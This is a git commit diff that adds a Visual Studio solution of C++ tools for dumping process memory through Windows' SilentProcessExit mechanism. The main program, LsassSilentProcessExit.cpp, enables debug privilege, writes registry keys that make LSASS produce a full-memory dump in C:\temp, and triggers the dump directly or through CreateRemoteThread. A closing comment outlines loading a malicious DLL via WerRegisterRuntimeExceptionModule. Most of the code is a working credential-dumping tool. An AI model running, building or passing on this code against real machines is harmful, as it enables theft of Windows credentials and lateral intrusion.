commit 3ed04e92b22b3beb18c0298ea8be458d67f39556 Author: Asaf Gilboa Date: Sun Nov 29 10:51:11 2020 +0200 Initial commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..4ce6fdd --- /dev/null +++ b/.gitignore @@ -0,0 +1,340 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. +## +## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +[Aa][Rr][Mm]/ +[Aa][Rr][Mm]64/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUNIT +*.VisualState.xml +TestResult.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# JustCode is a .NET coding add-in +.JustCode + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!?*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser +*- Backup*.rdl + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# JetBrains Rider +.idea/ +*.sln.iml + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# BeatPulse healthcheck temp database +healthchecksdb \ No newline at end of file diff --git a/LsassSilentProcessExit/LsassSilentProcessExit.cpp b/LsassSilentProcessExit/LsassSilentProcessExit.cpp new file mode 100644 index 0000000..ea09772 --- /dev/null +++ b/LsassSilentProcessExit/LsassSilentProcessExit.cpp @@ -0,0 +1,118 @@ +#include +#include "SilentProcessExitRegistrySetter.h" + +#define USAGE "Usage: LsassSilentProcessExit.exe \n\tDUMP_MODE:\n\t\t0 - Call RtlSilentProcessExit on LSASS process handle\n\t\t1 - Call CreateRemoteThread on RtlSilentProcessExit on LSASS\n" +#define DUMP_MODE_LSASS_HANDLE 0 +#define DUMP_MODE_CREATE_REMOTE_THREAD 1 + +typedef NTSTATUS(NTAPI* RtlReportSilentProcessExit_func) ( + _In_ HANDLE ProcessHandle, + _In_ NTSTATUS ExitStatus + ); + +BOOL EnableDebugPrivilege(BOOL bEnable) +{ + HANDLE hToken = nullptr; + LUID luid; + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE; + if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) return FALSE; + + TOKEN_PRIVILEGES tokenPriv; + tokenPriv.PrivilegeCount = 1; + tokenPriv.Privileges[0].Luid = luid; + tokenPriv.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0; + + if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return FALSE; + + return TRUE; +} + +int main(int argc, char* argv[]) +{ + if (argc < 2) + { + std::cout << USAGE; + return -1; + } + + int dumpMode = atoi(argv[2]); + + if (dumpMode != DUMP_MODE_LSASS_HANDLE && dumpMode != DUMP_MODE_CREATE_REMOTE_THREAD) + { + std::cout << USAGE; + return -1; + } + + std::cout << "Setting up debug privilege...\n"; + + if (!EnableDebugPrivilege(TRUE)) + { + std::cout << "ERROR: Failed to enable debug privilege!\n"; + return -1; + } + + std::cout << "Setting up GFlags & SilentProcessExit settings in registry...\n"; + + // This sets up the GlobalFlag value in the IFEO registry key and the SilentProcessExit registry values + SilentProcessExitRegistrySetter speRegSetter("lsass.exe"); + + // Make sure we've written all the relevant registry keys + if (!speRegSetter.isValid()) + { + std::cout << "ERROR: Could not set registry values!\n"; + return -1; + } + + HMODULE hNtdll = GetModuleHandle(L"ntdll.dll"); + RtlReportSilentProcessExit_func RtlReportSilentProcessExit = (RtlReportSilentProcessExit_func)GetProcAddress(hNtdll, "RtlReportSilentProcessExit"); + + int pid = atoi(argv[1]); + + DWORD desiredAccess; + + if (dumpMode == DUMP_MODE_LSASS_HANDLE) + desiredAccess = PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ; + else + // CreateRemoteThread required privileges + desiredAccess = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE; + + HANDLE hProcess = OpenProcess(desiredAccess, FALSE, pid); + + if (hProcess == INVALID_HANDLE_VALUE) + { + int lastError = GetLastError(); + + std::cout << "ERROR OpenProcess() failed with error: " << lastError << "\n"; + return -1; + } + + // If true, run RtlReportSilentProcessExit() on the LSASS handle + if (dumpMode == DUMP_MODE_LSASS_HANDLE) + { + NTSTATUS ntstatus = RtlReportSilentProcessExit(hProcess, 0); + + std::cout << "RtlReportSilentProcessExit() NTSTATUS: " << std::hex << ntstatus << "\n"; + + return 0; + } + + // Dump mode is CreateRemoteThread + + + // While RtlReportSilentProcessExit accepts two parameters, + // the second parameter is the exit code which has no significant effect on the API. + // The first parameter is set to -1 (0xFFFF) which is the pseudo-handle returned from GetCurrentProcess() + HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RtlReportSilentProcessExit, (LPVOID)-1, NULL, NULL); + + if (!hThread) + { + int lastError = GetLastError(); + std::cout << "ERROR CreateRemoteThread() failed with error: " << lastError << "\n"; + return -1; + } + + std::cout << "DONE! Check out the dump folder (C:\\temp)" << "\n"; + + return 0; +} diff --git a/LsassSilentProcessExit/LsassSilentProcessExit.vcxproj b/LsassSilentProcessExit/LsassSilentProcessExit.vcxproj new file mode 100644 index 0000000..a7e251e --- /dev/null +++ b/LsassSilentProcessExit/LsassSilentProcessExit.vcxproj @@ -0,0 +1,160 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128} + Win32Proj + LsassSilentProcessExit + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + MultiThreadedDebug + + + Console + DebugFull + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + + + + + \ No newline at end of file diff --git a/LsassSilentProcessExit/LsassSilentProcessExit.vcxproj.filters b/LsassSilentProcessExit/LsassSilentProcessExit.vcxproj.filters new file mode 100644 index 0000000..8f9b186 --- /dev/null +++ b/LsassSilentProcessExit/LsassSilentProcessExit.vcxproj.filters @@ -0,0 +1,30 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + Source Files + + + + + Header Files + + + \ No newline at end of file diff --git a/LsassSilentProcessExit/SilentProcessExitRegistrySetter.cpp b/LsassSilentProcessExit/SilentProcessExitRegistrySetter.cpp new file mode 100644 index 0000000..67ad4a6 --- /dev/null +++ b/LsassSilentProcessExit/SilentProcessExitRegistrySetter.cpp @@ -0,0 +1,66 @@ +#include "SilentProcessExitRegistrySetter.h" + + +SilentProcessExitRegistrySetter::SilentProcessExitRegistrySetter(std::string processName) +{ + this->m_isValid = FALSE; // Defaults to FALSE + + std::string subkeyIFEO = IFEO_REG_KEY + processName; + + LSTATUS ret = RegCreateKeyA(HKEY_LOCAL_MACHINE, subkeyIFEO.c_str(), &this->m_hIFEORegKey); + + if (ret != ERROR_SUCCESS) + return; + + // https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/gflags-flag-table + DWORD globalFlagData = FLG_MONITOR_SILENT_PROCESS_EXIT; + ret = RegSetValueExA(this->m_hIFEORegKey, "GlobalFlag", 0, REG_DWORD, (const BYTE*)&globalFlagData, sizeof(DWORD)); + + if (ret != ERROR_SUCCESS) + { + RegCloseKey(this->m_hIFEORegKey); + return; + } + + + std::string subkeySPE = SILENT_PROCESS_EXIT_REG_KEY + processName; + + ret = RegCreateKeyA(HKEY_LOCAL_MACHINE, subkeySPE.c_str(), &this->m_hSPERegKey); + + if (ret != ERROR_SUCCESS) + { + RegCloseKey(this->m_hIFEORegKey); + return; + } + + DWORD ReportingMode = MiniDumpWithFullMemory; + std::string LocalDumpFolder = DUMP_FOLDER; + DWORD DumpType = LOCAL_DUMP; + + // Set SilentProcessExit registry values for the target process + ret = RegSetValueExA(this->m_hSPERegKey, "ReportingMode", 0, REG_DWORD, (const BYTE*)&ReportingMode, sizeof(DWORD)); + + ret = RegSetValueExA(this->m_hSPERegKey, "LocalDumpFolder", 0, REG_SZ, (const BYTE*)LocalDumpFolder.c_str(), LocalDumpFolder.size() + 1); + + ret = RegSetValueExA(this->m_hSPERegKey, "DumpType", 0, REG_DWORD, (const BYTE*)&DumpType, sizeof(DWORD)); + + if (ret != ERROR_SUCCESS) + { + RegCloseKey(this->m_hSPERegKey); + RegCloseKey(this->m_hIFEORegKey); + return; + } + + this->m_isValid = TRUE; +} + +SilentProcessExitRegistrySetter::~SilentProcessExitRegistrySetter() +{ + RegCloseKey(this->m_hSPERegKey); + RegCloseKey(this->m_hIFEORegKey); +} + +BOOL SilentProcessExitRegistrySetter::isValid() +{ + return this->m_isValid; +} diff --git a/LsassSilentProcessExit/SilentProcessExitRegistrySetter.h b/LsassSilentProcessExit/SilentProcessExitRegistrySetter.h new file mode 100644 index 0000000..17190dd --- /dev/null +++ b/LsassSilentProcessExit/SilentProcessExitRegistrySetter.h @@ -0,0 +1,25 @@ +#pragma once +#include +#include + + +#define IFEO_REG_KEY "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" +#define SILENT_PROCESS_EXIT_REG_KEY "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\" +#define LOCAL_DUMP 0x2 +#define FLG_MONITOR_SILENT_PROCESS_EXIT 0x200 +#define DUMP_FOLDER "C:\\temp" +#define MiniDumpWithFullMemory 0x2 + +class SilentProcessExitRegistrySetter +{ +public: + SilentProcessExitRegistrySetter(std::string processName); + ~SilentProcessExitRegistrySetter(); + + BOOL isValid(); + +private: + BOOL m_isValid; + HKEY m_hIFEORegKey; + HKEY m_hSPERegKey; +}; \ No newline at end of file diff --git a/SilentProcessExit.sln b/SilentProcessExit.sln new file mode 100644 index 0000000..5310e2a --- /dev/null +++ b/SilentProcessExit.sln @@ -0,0 +1,51 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.29613.14 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SilentProcessExit", "SilentProcessExit\SilentProcessExit.vcxproj", "{35C06DB1-8DF8-4C84-8450-C0889380A807}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SilentProcessExitRemoteThread", "SilentProcessExitRemoteThread\SilentProcessExitRemoteThread.vcxproj", "{FD3F3A98-E885-41D7-9B34-9CF9C7614B69}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LsassSilentProcessExit", "LsassSilentProcessExit\LsassSilentProcessExit.vcxproj", "{E82BCAD1-0D2B-4E95-B382-933CF78A8128}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Debug|x64.ActiveCfg = Debug|x64 + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Debug|x64.Build.0 = Debug|x64 + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Debug|x86.ActiveCfg = Debug|Win32 + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Debug|x86.Build.0 = Debug|Win32 + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Release|x64.ActiveCfg = Release|x64 + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Release|x64.Build.0 = Release|x64 + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Release|x86.ActiveCfg = Release|Win32 + {35C06DB1-8DF8-4C84-8450-C0889380A807}.Release|x86.Build.0 = Release|Win32 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Debug|x64.ActiveCfg = Debug|x64 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Debug|x64.Build.0 = Debug|x64 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Debug|x86.ActiveCfg = Debug|Win32 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Debug|x86.Build.0 = Debug|Win32 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Release|x64.ActiveCfg = Release|x64 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Release|x64.Build.0 = Release|x64 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Release|x86.ActiveCfg = Release|Win32 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69}.Release|x86.Build.0 = Release|Win32 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Debug|x64.ActiveCfg = Debug|x64 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Debug|x64.Build.0 = Debug|x64 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Debug|x86.ActiveCfg = Debug|Win32 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Debug|x86.Build.0 = Debug|Win32 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Release|x64.ActiveCfg = Release|x64 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Release|x64.Build.0 = Release|x64 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Release|x86.ActiveCfg = Release|Win32 + {E82BCAD1-0D2B-4E95-B382-933CF78A8128}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {B358CE26-541F-4EB7-BEC2-13C43F98E169} + EndGlobalSection +EndGlobal diff --git a/SilentProcessExit/SilentProcessExit.cpp b/SilentProcessExit/SilentProcessExit.cpp new file mode 100644 index 0000000..9e1d626 --- /dev/null +++ b/SilentProcessExit/SilentProcessExit.cpp @@ -0,0 +1,57 @@ +// SilentProcessExit.cpp : This file contains the 'main' function. Program execution begins and ends there. +// + +#include +#include + +typedef NTSTATUS(NTAPI* RtlReportSilentProcessExit_func) ( + _In_ HANDLE ProcessHandle, + _In_ NTSTATUS ExitStatus + ); + +BOOL EnableDebugPrivilege(BOOL bEnable) +{ + HANDLE hToken = nullptr; + LUID luid; + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE; + if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) return FALSE; + + TOKEN_PRIVILEGES tokenPriv; + tokenPriv.PrivilegeCount = 1; + tokenPriv.Privileges[0].Luid = luid; + tokenPriv.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0; + + if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return FALSE; + + return TRUE; +} + +int main(int argc, char* argv[]) +{ + if (!EnableDebugPrivilege(TRUE)) + { + std::cout << "ERROR: Could not adjust token privileges! \n"; + return -1; + } + + HMODULE hNtdll = GetModuleHandle(L"ntdll.dll"); + RtlReportSilentProcessExit_func RtlReportSilentProcessExit = (RtlReportSilentProcessExit_func)GetProcAddress(hNtdll, "RtlReportSilentProcessExit"); + + int pid = atoi(argv[1]); + + HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, FALSE, pid); + + if (hProcess == INVALID_HANDLE_VALUE) + { + int lastError = GetLastError(); + + + std::cout << "ERROR OpenProcess() failed with error: " << lastError << "\n"; + return -1; + } + + NTSTATUS ntstatus = RtlReportSilentProcessExit(hProcess, 0); + + std::cout << "RtlReportSilentProcessExit() NTSTATUS: " << std::hex << ntstatus << "\n"; +} diff --git a/SilentProcessExit/SilentProcessExit.vcxproj b/SilentProcessExit/SilentProcessExit.vcxproj new file mode 100644 index 0000000..cd18488 --- /dev/null +++ b/SilentProcessExit/SilentProcessExit.vcxproj @@ -0,0 +1,157 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + {35C06DB1-8DF8-4C84-8450-C0889380A807} + Win32Proj + SilentProcessExit + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + MultiThreadedDebug + + + Console + DebugFull + + + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + MultiThreadedDebug + + + Console + DebugFull + + + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SilentProcessExit/SilentProcessExit.vcxproj.filters b/SilentProcessExit/SilentProcessExit.vcxproj.filters new file mode 100644 index 0000000..4ad64c4 --- /dev/null +++ b/SilentProcessExit/SilentProcessExit.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.cpp b/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.cpp new file mode 100644 index 0000000..7ad1dfc --- /dev/null +++ b/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.cpp @@ -0,0 +1,89 @@ +// SilentProcessExit.cpp : This file contains the 'main' function. Program execution begins and ends there. +// + +#include +#include + +typedef NTSTATUS(NTAPI* RtlReportSilentProcessExit_func) ( + _In_ HANDLE ProcessHandle, + _In_ NTSTATUS ExitStatus + ); + +BOOL EnableDebugPrivilege(BOOL bEnable) +{ + HANDLE hToken = nullptr; + LUID luid; + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE; + if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) return FALSE; + + TOKEN_PRIVILEGES tokenPriv; + tokenPriv.PrivilegeCount = 1; + tokenPriv.Privileges[0].Luid = luid; + tokenPriv.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0; + + if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) return FALSE; + + return TRUE; +} + +int main(int argc, char* argv[]) +{ + if (!EnableDebugPrivilege(TRUE)) + { + std::cout << "ERROR: Could not adjust token privileges! \n"; + return -1; + } + + HMODULE hNtdll = GetModuleHandle(L"ntdll.dll"); + PVOID pRtlReportSilentProcessExit = GetProcAddress(hNtdll, "RtlReportSilentProcessExit"); + + int pid = atoi(argv[1]); + + HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, pid); + + if (hProcess == INVALID_HANDLE_VALUE) + { + int lastError = GetLastError(); + std::cout << "ERROR OpenProcess() failed with error: " << lastError << "\n"; + return -1; + } + + // 0xFFFFFFFF = Self process + char* buf = (char*)"\xFF\xFF\xFF\xFF"; + + LPVOID arg = (LPVOID)VirtualAllocEx(hProcess, NULL, sizeof(buf), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); + + if (!arg) + { + int lastError = GetLastError(); + std::cout << "ERROR VirtualAllocEx() failed with error: " << lastError << "\n"; + return -1; + } + + if (!WriteProcessMemory(hProcess, arg, buf, sizeof(buf), NULL)) + { + int lastError = GetLastError(); + std::cout << "ERROR WriteProcessMemory() failed with error: " << lastError << "\n"; + return -1; + } + + HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRtlReportSilentProcessExit, (LPVOID)-1, NULL, NULL); + + if (!hThread) + { + int lastError = GetLastError(); + std::cout << "ERROR CreateRemoteThread() failed with error: " << lastError << "\n"; + return -1; + } + + std::cout << "Done!\n"; + std::cout << "arg = " << std::hex << arg << "\n"; +} + +// https://www.hexacorn.com/blog/2018/09/ +// Call WerRegisterRuntimeExceptionModule() to register a malicious DLL which once loaded will find and ovewrite the following strings: +// Directory string format: +// %s\\%s-(PID-%u)-%u +// File Name string format: +// %s\\%s-(PID-%u).dmp diff --git a/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.vcxproj b/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.vcxproj new file mode 100644 index 0000000..056063b --- /dev/null +++ b/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.vcxproj @@ -0,0 +1,156 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + {FD3F3A98-E885-41D7-9B34-9CF9C7614B69} + Win32Proj + SilentProcessExitRemoteThread + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + MultiThreadedDebug + + + Console + DebugFull + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.vcxproj.filters b/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.vcxproj.filters new file mode 100644 index 0000000..071973b --- /dev/null +++ b/SilentProcessExitRemoteThread/SilentProcessExitRemoteThread.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file